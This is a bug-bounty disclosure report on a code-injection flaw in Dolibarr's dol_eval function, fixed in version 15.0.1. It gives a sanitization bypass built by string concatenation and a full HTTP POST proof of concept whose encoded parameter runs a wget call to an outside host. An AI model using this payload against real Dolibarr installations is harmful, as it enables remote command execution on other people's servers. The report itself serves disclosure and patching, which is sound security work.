Code Injection in dolibarr/dolibarr

Valid

Reported on

Feb 28th 2022

Description

Improper php function sanitization, lead to an ability to inject arbitrary PHP code and run arbitrary commands on file system. In the function "dol_eval" in file "dolibarr/htdocs/core/lib/functions.lib.php" dangerous PHP functions are sanitized using "str_replace" and can be bypassed using following code in $s parameter

('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')

Proof of Concept

User with rights to add menus to the system can exploit this vulnerabilty with the following request

POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Referer: http://192.168.255.78/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1

token=84da28fc90b6abc2238f2e0da2e5ee10&menu_handler=all&user=2&type=top&propertymainmenu=testtest&titre=testtest&url=testtest&langs=&position=100&target=&enabled=1&perms=%28%27she%27.%27ll_%27.%27ex%27.%27ec%27%29%28%27wget+https%3A%2F%2F<REDACTED>%27%29&save=Save

Impact

This vulnerability is capable of run arbitrary commands in the file system

We are processing your report and will contact the dolibarr team within 24 hours. a year ago

We have contacted a member of the dolibarr team and are waiting to hear back a year ago

Laurent Destailleur validated this vulnerability a year ago

d3addog has been awarded the disclosure bounty

The fix bounty is now up for grabs

Laurent Destailleur marked this as fixed in 15.0.1 with commit 2a48dd a year ago

Laurent Destailleur has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation